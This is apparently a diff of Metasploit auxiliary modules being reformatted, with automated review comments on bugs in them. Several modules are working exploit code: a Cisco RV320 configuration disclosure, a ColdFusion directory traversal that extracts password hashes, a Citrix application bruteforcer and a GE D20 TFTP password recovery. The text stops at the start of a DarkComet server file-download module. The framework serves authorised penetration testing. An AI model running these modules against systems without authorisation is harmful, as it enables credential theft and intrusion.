'License' => MSF_LICENSE
)
)
register_options(
[
@@ -86,7 +89,7 @@ class MetasploitModule < Msf::Auxiliary
'id' => id,
'method' => 'Page.navigate',
'params' => {
url: fetch_uri
url: fetch_uri
}
}.to_json)
end
+19 -18
@@ -7,9 +7,11 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
'Description' => %q{
super(
update_info(
info,
'Name' => 'Cisco RV320/RV326 Configuration Disclosure',
'Description' => %q{
A vulnerability in the web-based management interface of Cisco Small Business
RV320 and RV325 Dual Gigabit WAN VPN routers could allow an unauthenticated,
remote attacker to retrieve sensitive information. The vulnerability is due
@@ -19,14 +21,12 @@ class MetasploitModule < Msf::Auxiliary
download the router configuration or detailed diagnostic information. Cisco
has released firmware updates that address this vulnerability.
},
'Author' =>
[
'Author' => [
'RedTeam Pentesting GmbH <release@redteam-pentesting.de>',
'Aaron Soto <asoto@rapid7.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
['EDB', '46262'],
['BID', '106732'],
['CVE', '2019-1653'],
@@ -34,18 +34,19 @@ class MetasploitModule < Msf::Auxiliary
['URL', 'https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvg42801'],
['URL', 'https://www.cisco.com/c/en/us/support/docs/csa/cisco-sa-20110330-acs.html']
],
'DisclosureDate' => '2019-01-24',
'DefaultOptions' =>
{
'SSL' => true
'DisclosureDate' => '2019-01-24',
'DefaultOptions' => {
'SSL' => true
}
))
)
)
register_options(
[
Opt::RPORT(443),
OptString.new('TARGETURI', [true, 'Path to the device configuration file', '/cgi-bin/config.exp']),
])
]
)
end
def report_cred(user, hash)
@@ -100,8 +101,8 @@ class MetasploitModule < Msf::Auxiliary
begin
uri = normalize_uri(target_uri.path)
res = send_request_cgi({
'uri' => uri,
'method' => 'GET',
'uri' => uri,
'method' => 'GET',
}, 60)
rescue OpenSSL::SSL::SSLError
fail_with(Failure::UnexpectedReply, 'SSL handshake failed. Consider setting SSL to false and trying again.')
@@ -116,8 +117,8 @@ class MetasploitModule < Msf::Auxiliary
body = res.body
if body.match(/####sysconfig####/)
parse_config(body)
else body.include?"meta http-equiv=refresh content='0; url=/default.htm'"
fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
else body.include? "meta http-equiv=refresh content='0; url=/default.htm'"
fail_with(Failure::NotVulnerable, 'Response suggests device is patched')
end
end
end
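Review bot: `else body.include? "meta http-equiv=refresh content='0; url=/default.htm'"` in the `@@ -116` hunk is an `else` branch whose first statement is a discarded boolean, not a condition: the `include?` result is thrown away and `fail_with(Failure::NotVulnerable, 'Response suggests device is patched')` runs for every body that lacks `####sysconfig####`, including unexpected replies. It should be `elsif body.include?("meta http-equiv=refresh content='0; url=/default.htm'")`, with a final `else fail_with(Failure::UnexpectedReply, 'Unexpected response body')` so that other replies are reported as such rather than as patched. The enclosing method starts outside the hunk.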
@@ -7,23 +7,26 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix MetaFrame ICA Published Applications Scanner',
'Description' => %q{
This module attempts to query Citrix Metaframe ICA server to obtain
a published list of applications.
},
'Author' => [ 'aushack' ],
'References' =>
[
super(
update_info(
info,
'Name' => 'Citrix MetaFrame ICA Published Applications Scanner',
'Description' => %q{
This module attempts to query Citrix Metaframe ICA server to obtain
a published list of applications.
},
'Author' => [ 'aushack' ],
'References' => [
[ 'URL', 'http://www.securiteam.com/exploits/5CP0B1F80S.html' ],
]
))
)
)
register_options(
[
Opt::RPORT(1604),
])
]
)
end
def autofilter
@@ -46,7 +49,7 @@ class MetasploitModule < Msf::Auxiliary
udp_sock.put(client_connect)
res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
if (res[0, server_response.length] == server_response)
print_status("Citrix MetaFrame ICA server detected. Requesting Published Applications list...")
find_published =
@@ -62,7 +65,7 @@ class MetasploitModule < Msf::Auxiliary
res = udp_sock.get(3)
if (res.index(server_list_pre) == 0) # good packet, with following data
print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length,res.length].gsub("\x00","\r\n"))
print_status("Citrix Applications Reported:\r\n" + res[server_list_pre.length, res.length].gsub("\x00", "\r\n"))
end
else
print_error("Citrix did not report any Published Applications. Try the brute force module instead.")
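Review bot: `res[0, server_response.length] == server_response` in the `@@ -46` hunk (and the same idiom at three places in the Citrix bruteforcer section below) raises NoMethodError if `udp_sock.get(3)` returns nil on a timeout instead of a String; `res&.start_with?(server_response)` states the prefix test directly and tolerates a nil reply. Likewise `res[server_list_pre.length, res.length]` in the `@@ -62` hunk is `res[server_list_pre.length..]`, and `res.index(server_list_pre) == 0` is `res.start_with?(server_list_pre)`. Whether `get` can return nil here is not visible in the hunk; the guard costs nothing either way. The enclosing method starts outside these hunks.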
@@ -7,24 +7,27 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Udp
def initialize(info = {})
super(update_info(info,
'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
'Description' => %q{
This module attempts to brute force program names within the Citrix
Metaframe ICA server.
},
'Author' => [ 'aushack' ],
'References' =>
[
super(
update_info(
info,
'Name' => 'Citrix MetaFrame ICA Published Applications Bruteforcer',
'Description' => %q{
This module attempts to brute force program names within the Citrix
Metaframe ICA server.
},
'Author' => [ 'aushack' ],
'References' => [
[ 'OSVDB', '50617' ],
[ 'BID', '5817' ]
]
))
)
)
register_options(
[
Opt::RPORT(1604),
])
]
)
end
def autofilter
@@ -142,11 +145,10 @@ class MetasploitModule < Msf::Auxiliary
udp_sock.put(client_connect)
res = udp_sock.get(3)
if (res[0,server_response.length] == server_response)
if (res[0, server_response.length] == server_response)
print_status("Citrix ICA Server Detected. Attempting to brute force Published Applications.")
applications.each do |application|
# Create the packet
packet = [52 + application.length].pack('C')
packet << "\x00\x02\x34\x02\xfd\xa8\xe3\x00\x00\x00\x00\x00\x00\x00\x00"
@@ -161,11 +163,11 @@ class MetasploitModule < Msf::Auxiliary
udp_sock.put(packet)
res = udp_sock.get(3)
if (res[0,application_valid.length] == application_valid)
if (res[0, application_valid.length] == application_valid)
print_status("Found: #{application}")
end
if (res[0,application_invalid.length] == application_invalid)
if (res[0, application_invalid.length] == application_invalid)
print_error("NOT Found: #{application}")
end
end
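Review bot: The length byte built at the top of the bruteforce loop, `packet = [52 + application.length].pack('C')`, wraps silently modulo 256, so any wordlist entry longer than 203 bytes yields a packet whose length field no longer matches its payload and the `application_valid`/`application_invalid` comparisons that follow cannot be trusted for it. A guard before the packet is assembled, `next if application.length > 203 # 52 + length must fit the one-byte length field`, skips such entries instead of sending a malformed probe. The `applications.each` loop runs past the end of its hunk.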
@@ -8,43 +8,45 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => "ColdFusion 'password.properties' Hash Extraction",
'Description' => %q{
super(
update_info(
info,
'Name' => "ColdFusion 'password.properties' Hash Extraction",
'Description' => %q{
This module uses a directory traversal vulnerability to extract information
such as password, rdspassword, and "encrypted" properties. This module has been
tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
},
'References' =>
[
such as password, rdspassword, and "encrypted" properties. This module has been
tested successfully on ColdFusion 9 and ColdFusion 10 (auto-detect).
},
'References' => [
[ 'CVE', '2013-3336' ],
[ 'OSVDB', '93114' ],
[ 'EDB', '25305' ]
],
'Author' =>
[
'Author' => [
'HTP',
'sinn3r',
'nebulus'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2013-05-07' #The day we saw the subzero poc
))
'License' => MSF_LICENSE,
# The day we saw the subzero poc
'DisclosureDate' => '2013-05-07'
)
)
register_options(
[
Opt::RPORT(80),
OptString.new("TARGETURI", [true, 'Base path to ColdFusion', '/'])
])
]
)
end
def fingerprint(response)
if(response.headers.has_key?('Server') )
if(response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
if (response.headers.has_key?('Server'))
if (response.headers['Server'] =~ /IIS/ or response.headers['Server'] =~ /\(Windows/)
os = "Windows (#{response.headers['Server']})"
elsif(response.headers['Server'] =~ /Apache\//)
os = "Unix (#{response.headers['Server']})"
elsif (response.headers['Server'] =~ /Apache\//)
os = "Unix (#{response.headers['Server']})"
else
os = response.headers['Server']
end
@@ -54,41 +56,41 @@ class MetasploitModule < Msf::Auxiliary
title = "Not Found"
response.body.gsub!(/[\r\n]/, '')
if(response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
if (response.body =~ /<title.*\/?>(.+)<\/title\/?>/i)
title = $1
title.gsub!(/\s/, '')
end
return nil if( title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
return nil if (title == 'Not Found' or not title =~ /ColdFusionAdministrator/)
out = nil
if(response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
if (response.body =~ />\s*Version:\s*(.*)<\/strong\><br\s\//)
v = $1
out = (v =~ /^6/) ? "Adobe ColdFusion MX6 (Not Vulnerable)" : "Adobe ColdFusion MX7 (Not Vulnerable)"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/ )
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright 1995-2012 Adobe/ and response.body =~ /Administrator requires a browser that supports frames/)
out = "Adobe ColdFusion MX7 (Not Vulnerable)"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2006 Adobe/)
out = "Adobe ColdFusion 8 (Not Vulnerable)"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2010 Adobe/ and
response.body =~ /1997\-2012 Adobe Systems Incorporated and its licensors/)
out = "Adobe ColdFusion 10"
elsif(response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
elsif (response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995-2010 Adobe/ or
response.body =~ /<meta name=\"Author\" content=\"Copyright \(c\) 1995\-2009 Adobe Systems\, Inc\. All rights reserved/)
out = "Adobe ColdFusion 9"
elsif(response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
elsif (response.body =~ /<meta name=\"Keywords\" content=\"(.*)\">\s+<meta name/)
out = $1.split(/,/)[0]
else
out = 'Unknown ColdFusion'
end
if(title.downcase == 'coldfusionadministrator')
if (title.downcase == 'coldfusionadministrator')
out << " (you have administrator access)"
end
out << " (#{os})"
file = ''
trav = ''
if(os =~ /Windows/ )
if (os =~ /Windows/)
trav = '..\..\..\..\..\..\..\..\..\..'
file = (out =~ /ColdFusion 9/) ? '\ColdFusion9\lib\password.properties' : '\ColdFusion10\CFusion\lib\password.properties'
else
@@ -96,13 +98,13 @@ class MetasploitModule < Msf::Auxiliary
file = (out =~ /ColdFusion 9/) ? '/opt/coldfusion9/lib/password.properties' : '/opt/coldfusion10/cfusion/lib/password.properties'
end
if(response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
if (response.body =~ /Adobe/ and response.body =~ /ColdFusion/ and file == '')
print_error("#{peer} Fingerprint failed...aborting")
print_status("response: #{response.body}")
return nil,nil
return nil, nil
end
return out,"#{trav}#{file}"
return out, "#{trav}#{file}"
end
def check
@@ -117,26 +119,26 @@ class MetasploitModule < Msf::Auxiliary
vuln = false
url = '/CFIDE/adminapi/customtags/l10n.cfm'
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
if (res != nil)
# can't stack b/c res.code won't exist if res is nil
vuln = true if (res.code == 500 and res.body =~ /attributes\.id was not provided/)
end
if (vuln)
url = '/CFIDE/administrator/mail/download.cfm'
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
if(res != nil)
# can't stack b/c res.code won't exist if res is nil
vuln = true if(res.code == 500 and res.body =~ /attributes\.id was not provided/)
end
if(vuln)
url = '/CFIDE/administrator/mail/download.cfm'
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
if(res != nil)
})
if (res != nil)
vuln = false if (res.code != 200)
end
end
@@ -144,18 +146,17 @@ class MetasploitModule < Msf::Auxiliary
return vuln
end
def run
filename = ""
url = '/CFIDE/administrator/index.cfm'
# print_status("Getting index...")
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
'uri' => url,
'method' => 'GET',
'Connection' => "keep-alive",
'Accept-Encoding' => "zip,deflate",
})
# print_status("Got back: #{res.inspect}")
return if not res
return if not res.body or not res.code
@@ -164,31 +165,31 @@ class MetasploitModule < Msf::Auxiliary
out, filename = fingerprint(res)
print_status("#{peer} #{out}") if out
if(out =~ /Not Vulnerable/)
if (out =~ /Not Vulnerable/)
print_status("#{peer} isn't vulnerable to this attack")
return
end
if(not check_cf)
if (not check_cf)
print_status("#{peer} can't be exploited (either files missing or permissions block access)")
return
end
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'CFIDE', 'adminapi', 'customtags', 'l10n.cfm'),
'encode_params' => false,
'encode' => false,
'vars_get' => {
'attributes.id' => 'it',
'attributes.file' => '../../administrator/mail/download.cfm',
'filename' => filename,
'attributes.locale' => 'it',
'attributes.var' => 'it',
'attributes.jscript' => 'false',
'attributes.type' => 'text/html',
'attributes.charset' => 'UTF-8',
'thisTag.executionmode' => 'end',
'attributes.id' => 'it',
'attributes.file' => '../../administrator/mail/download.cfm',
'filename' => filename,
'attributes.locale' => 'it',
'attributes.var' => 'it',
'attributes.jscript' => 'false',
'attributes.type' => 'text/html',
'attributes.charset' => 'UTF-8',
'thisTag.executionmode' => 'end',
'thisTag.generatedContent' => 'htp'
}
})
@@ -198,9 +199,9 @@ class MetasploitModule < Msf::Auxiliary
return
end
rdspass = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
password = res.body.scan(/^password=(.+)/).flatten[0] || ''
encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0] || ''
rdspass = res.body.scan(/^rdspassword=(.+)/).flatten[0] || ''
password = res.body.scan(/^password=(.+)/).flatten[0] || ''
encrypted = res.body.scan(/^encrypted=(.+)/).flatten[0] || ''
if rdspass.empty? and password.empty?
# No pass collected, no point to store anything
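Review bot: The request hashes in `check_cf` and `run` carry `'Connection' => "keep-alive"` and `'Accept-Encoding' => "zip,deflate"` as top-level keys of the `send_request_cgi` options rather than under `'headers'`, so they are most likely never sent; if they were, `zip` is not a registered HTTP content coding, and advertising `deflate` would invite a compressed body that the `res.body =~ /attributes\.id was not provided/` checks on the following lines could not match. Either delete the two keys from all three requests or move them into `'headers' => { 'Accept-Encoding' => 'identity' }` so the regex matching is guaranteed to see plain text. `check_cf` begins outside its hunk; `run` starts inside the third hunk and continues past it.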
+59 -53
@@ -9,33 +9,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company ID Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given CorpWatch ID of the company. If you don't know the
CorpWatch ID, please use the corpwatch_lookup_name module first.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
super(
update_info(
info,
'Name' => 'CorpWatch Company ID Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given CorpWatch ID of the company. If you don't know the
CorpWatch ID, please use the corpwatch_lookup_name module first.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' => [
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
)
)
deregister_http_client_options
register_options(
[
OptString.new('CW_ID', [ true, "The CorpWatch ID of the company", ""]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
OptBool.new('GET_LOCATIONS', [ false, "Get locations for company", true]),
OptBool.new('GET_NAMES', [ false, "Get all registered names ofr the company", true]),
OptBool.new('GET_FILINGS', [ false, "Get all filings", false ]),
OptBool.new('GET_CHILDREN', [false, "Get children companies", true]),
OptInt.new('CHILD_LIMIT', [false, "Set limit to how many children we can get", 5]),
OptBool.new('GET_HISTORY', [false, "Get company history", false])
])
]
)
end
def rhost_corpwatch
@@ -47,17 +50,16 @@ class MetasploitModule < Msf::Auxiliary
end
def run
loot = ""
uri = "/"
uri << (datastore['YEAR']).to_s if datastore['YEAR'].to_s != ""
uri << ("/companies/" + datastore['CW_ID'])
res = send_request_cgi({
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + ".xml",
'method' => 'GET'
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + ".xml",
'method' => 'GET'
}, 25)
if res == nil
@@ -116,13 +118,13 @@ class MetasploitModule < Msf::Auxiliary
loot << ("\nSector: " + (sector = grab_text(e, "sector_name")))
loot << ("\nSource: " + (source = grab_text(e, "source_type")))
loot << ("\nAddress: " + (address = grab_text(e, "raw_address")))
loot << ("\nCountry: " + ( country = grab_text(e, "country_code")))
loot << ("\nCountry: " + (country = grab_text(e, "country_code")))
loot << ("\nSub-Division: " + (subdiv = grab_text(e, "subdiv_code")))
loot << ("\nTop Parent CW_ID: " + (top_parent = grab_text(e, "top_parent_id")))
loot << ("\nNumber of parents: " + (num_parents = grab_text(e, "num_parents")))
loot << ("\nNumber of children: " + (num_children = grab_text(e, "num_children")))
loot << ("\nMax searchable year: " + (max_year = grab_text(e, "max_year")))
loot << ("\nMinimum searchable year: "+ (min_year = grab_text(e, "min_year")))
loot << ("\nMinimum searchable year: " + (min_year = grab_text(e, "min_year")))
loot << "\n\n\n"
print_status("Basic Information\n--------------------")
@@ -152,12 +154,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_LOCATIONS']
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/locations.xml",
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/locations.xml",
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or bad response")
@@ -190,9 +193,9 @@ class MetasploitModule < Msf::Auxiliary
results.elements.each { |e|
loot << ("CorpWatch ID: " + (cwid = grab_text(e, "cw_id")))
loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code"))
loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nType: " + (type = grab_text(e, "type")))
loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
loot << ("\nSubdivision code: " + (subdiv_code = grab_text(e, "subdiv_code")))
loot << ("\nType: " + (type = grab_text(e, "type")))
loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))
loot << ("\nStreet 1: " + (street1 = grab_text(e, "street_1")))
loot << ("\nStreet 2: " + (street2 = grab_text(e, "street_2")))
loot << ("\nCity: " + (city = grab_text(e, "city")))
@@ -224,12 +227,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_NAMES']
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/names.xml",
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/names.xml",
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or bad response")
@@ -286,12 +290,13 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_FILINGS']
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/filings.xml",
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/filings.xml",
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or response broken")
@@ -366,12 +371,13 @@ class MetasploitModule < Msf::Auxiliary
end
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => child_uri,
'method' => 'GET'
}, 25)
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => child_uri,
'method' => 'GET'
}, 25
)
if res == nil
print_error("Server down or bad response")
@@ -448,10 +454,10 @@ class MetasploitModule < Msf::Auxiliary
if datastore['GET_HISTORY']
res = send_request_cgi({
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/history.xml",
'method' => 'GET'
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri + "/history.xml",
'method' => 'GET'
}, 25)
if res == nil
@@ -524,7 +530,7 @@ class MetasploitModule < Msf::Auxiliary
end
end
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info","text/plain",nil,loot,"company_#{datastore['CW_ID']}.txt","#{datastore["CW_ID"]} Specific Information")
p = store_loot("corpwatch_api.#{datastore['CW_ID']}_info", "text/plain", nil, loot, "company_#{datastore['CW_ID']}.txt", "#{datastore["CW_ID"]} Specific Information")
print_line()
print_status("Saved in: #{p}")
@@ -532,7 +538,7 @@ class MetasploitModule < Msf::Auxiliary
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end
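Review bot: The parentheses in the locations loop are unbalanced on the new side: `loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code"))` leaves one group open and `loot << ("\nFull address: " + full_address = grab_text(e, "raw_address")))` closes one too many, so Ruby treats the three lines in between as statements inside the open group and the outer expression becomes `loot << loot`: the country-code text is computed but never appended, and everything collected so far is appended to itself. Balance them as `loot << ("\nCountry code: " + (country_code = grab_text(e, "country_code")))` and `loot << ("\nFull address: " + (full_address = grab_text(e, "raw_address")))`. Rubocop only re-indented these lines; the `results.elements.each` block continues past the hunk.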
@@ -10,30 +10,33 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'CorpWatch Company Name Information Search',
'Description' => %q{
super(
update_info(
info,
'Name' => 'CorpWatch Company Name Information Search',
'Description' => %q{
This module interfaces with the CorpWatch API to get publicly available
info for a given company name. Please note that by using CorpWatch API, you
acknowledge the limitations of the data CorpWatch provides, and should always
verify the information with the official SEC filings before taking any action.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' =>
[
info for a given company name. Please note that by using CorpWatch API, you
acknowledge the limitations of the data CorpWatch provides, and should always
verify the information with the official SEC filings before taking any action.
},
'Author' => [ 'Brandon Perry <bperry.volatile[at]gmail.com>' ],
'References' => [
[ 'URL', 'http://api.corpwatch.org/' ]
]
))
)
)
deregister_http_client_options
register_options(
[
OptString.new('COMPANY_NAME', [ true, "Search for companies with this name", ""]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year-1]),
OptInt.new('YEAR', [ false, "Year to look up", Time.now.year - 1]),
OptString.new('LIMIT', [ true, "Limit the number of results returned", "5"]),
OptString.new('CORPWATCH_APIKEY', [ false, "Use this API key when getting the data", ""]),
])
]
)
end
def rhost_corpwatch
@@ -45,24 +48,24 @@ class MetasploitModule < Msf::Auxiliary
end
def run
uri = "/"
uri << (datastore['YEAR'].to_s + "/") if datastore['YEAR'].to_s != ""
uri << "companies.xml"
res = send_request_cgi(
{
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri,
'method' => 'GET',
'vars_get' =>
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['CORPWATCH_APIKEY']
}
}, 25)
'rhost' => rhost_corpwatch,
'rport' => rport_corpwatch,
'uri' => uri,
'method' => 'GET',
'vars_get' =>
{
'company_name' => datastore['COMPANY_NAME'],
'limit' => datastore['LIMIT'],
'key' => datastore['CORPWATCH_APIKEY']
}
}, 25
)
if not res
print_error("Server down, bad response")
@@ -126,7 +129,7 @@ class MetasploitModule < Msf::Auxiliary
def grab_text(e, name)
(e.get_elements(name) && e.get_elements(name)[0] &&
e.get_elements(name)[0].get_text ) ?
e.get_elements(name)[0].get_text.to_s : ""
e.get_elements(name)[0].get_text) ?
e.get_elements(name)[0].get_text.to_s : ""
end
end
+35 -30
@@ -8,7 +8,6 @@
# parses the usernames and passwords from it.
##
class MetasploitModule < Msf::Auxiliary
include Rex::Ui::Text
include Rex::Proto::TFTP
@@ -16,28 +15,31 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'General Electric D20 Password Recovery',
'Description' => %q{
The General Electric D20ME and possibly other units (D200?) feature
TFTP readable configurations with plaintext passwords. This module
retrieves the username, password, and authentication level list.
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
'References' =>
[
super(
update_info(
info,
'Name' => 'General Electric D20 Password Recovery',
'Description' => %q{
The General Electric D20ME and possibly other units (D200?) feature
TFTP readable configurations with plaintext passwords. This module
retrieves the username, password, and authentication level list.
},
'Author' => [ 'K. Reid Wightman <wightman[at]digitalbond.com>' ],
'License' => MSF_LICENSE,
'References' => [
['CVE', '2012-6663'],
],
'DisclosureDate' => '2012-01-19'
))
'DisclosureDate' => '2012-01-19'
)
)
register_options(
[
Opt::RPORT(69),
Opt::RHOST('192.168.255.1'),
OptString.new('REMOTE_CONFIG_NAME', [true, "The remote filename used to retrieve the configuration", "NVRAM\\D20.zlb"])
])
]
)
end
def setup
@@ -51,16 +53,16 @@ class MetasploitModule < Msf::Auxiliary
def cleanup
if @tftp_client and @tftp_client.respond_to? :complete
while not @tftp_client.complete
select(nil,nil,nil,1)
select(nil, nil, nil, 1)
vprint_status "Cleaning up the TFTP client ports and threads."
@tftp_client.stop
end
end
end
def rtarget(ip=nil)
def rtarget(ip = nil)
if (ip or rhost) and rport
[(ip || rhost),rport].map {|x| x.to_s}.join(":") << " "
[(ip || rhost), rport].map { |x| x.to_s }.join(":") << " "
elsif (ip or rhost)
rhost
else
@@ -72,12 +74,12 @@ class MetasploitModule < Msf::Auxiliary
def retrieve
print_status("Retrieving file")
@tftp_client = Rex::Proto::TFTP::Client.new(
"LocalHost" => @lhost,
"LocalPort" => @lport,
"PeerHost" => @rhost,
"PeerPort" => @rport,
"RemoteFile" => @rfile,
"Action" => :download
"LocalHost" => @lhost,
"LocalPort" => @lport,
"PeerHost" => @rhost,
"PeerPort" => @rport,
"RemoteFile" => @rfile,
"Action" => :download
)
@tftp_client.send_read_request { |msg| print_tftp_status(msg) }
@tftp_client.threads do |thread|
@@ -95,6 +97,7 @@ class MetasploitModule < Msf::Auxiliary
def makeword(bytestr)
return bytestr.unpack("n")[0]
end
# builds abi
def makelong(bytestr)
return bytestr.unpack("N")[0]
@@ -160,6 +163,7 @@ class MetasploitModule < Msf::Auxiliary
if name == myname
return start
end
left = leftchild(f, start)
right = rightchild(f, start)
if name < myname
@@ -222,9 +226,10 @@ class MetasploitModule < Msf::Auxiliary
logins = Rex::Text::Table.new(
'Header' => "D20 usernames, passwords, and account levels\n(use for TELNET authentication)",
'Indent' => 1,
'Columns' => ["Type", "User Name", "Password"])
'Columns' => ["Type", "User Name", "Password"]
)
0.upto(numentries -1).each do |i|
0.upto(numentries - 1).each do |i|
f.seek(dstart + headerlen + i * entrylen)
accounttype = makeword(f.read(2))
f.seek(dstart + headerlen + i * entrylen + 2)
@@ -235,7 +240,7 @@ class MetasploitModule < Msf::Auxiliary
print_error("Bad account parsing at #{dstart + headerlen + i * entrylen}")
break
end
logins << [accounttype, accountname, accountpass]
logins << [accounttype, accountname, accountpass]
report_cred(
ip: datastore['RHOST'],
port: 23,
@@ -289,11 +294,11 @@ class MetasploitModule < Msf::Auxiliary
def print_tftp_status(msg)
case msg
when /Aborting/, /errors.$/
print_error [rtarget,msg].join
print_error [rtarget, msg].join
when /^WRQ accepted/, /^Sending/, /complete!$/
print_good [rtarget,msg].join
print_good [rtarget, msg].join
else
vprint_status [rtarget,msg].join
vprint_status [rtarget, msg].join
end
end
end
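Review bot: The account loop trusts `numentries`, which is parsed out of the configuration downloaded from the device: `f.seek(dstart + headerlen + i * entrylen)` followed by `accounttype = makeword(f.read(2))` runs before the `Bad account parsing` check, and once the seek lands past the end of the file `f.read(2)` returns nil and `makeword` raises on `nil.unpack("n")` instead of reaching that check. A `break if f.eof?` directly after the seek stops the loop at end of data; a one-byte short read would still make `unpack("n")` return nil, so checking `bytes.bytesize == 2` before unpacking is the stricter form. The loop header is inside the hunk, but the method enclosing it and the parse of `numentries` are not.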
@@ -8,26 +8,27 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'DarkComet Server Remote File Download Exploit',
'Description' => %q{
This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
The exploit does not need to know the password chosen for the bot/server communication.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'DarkComet Server Remote File Download Exploit',
'Description' => %q{
This module exploits an arbitrary file download vulnerability in the DarkComet C&C server versions 3.2 and up.
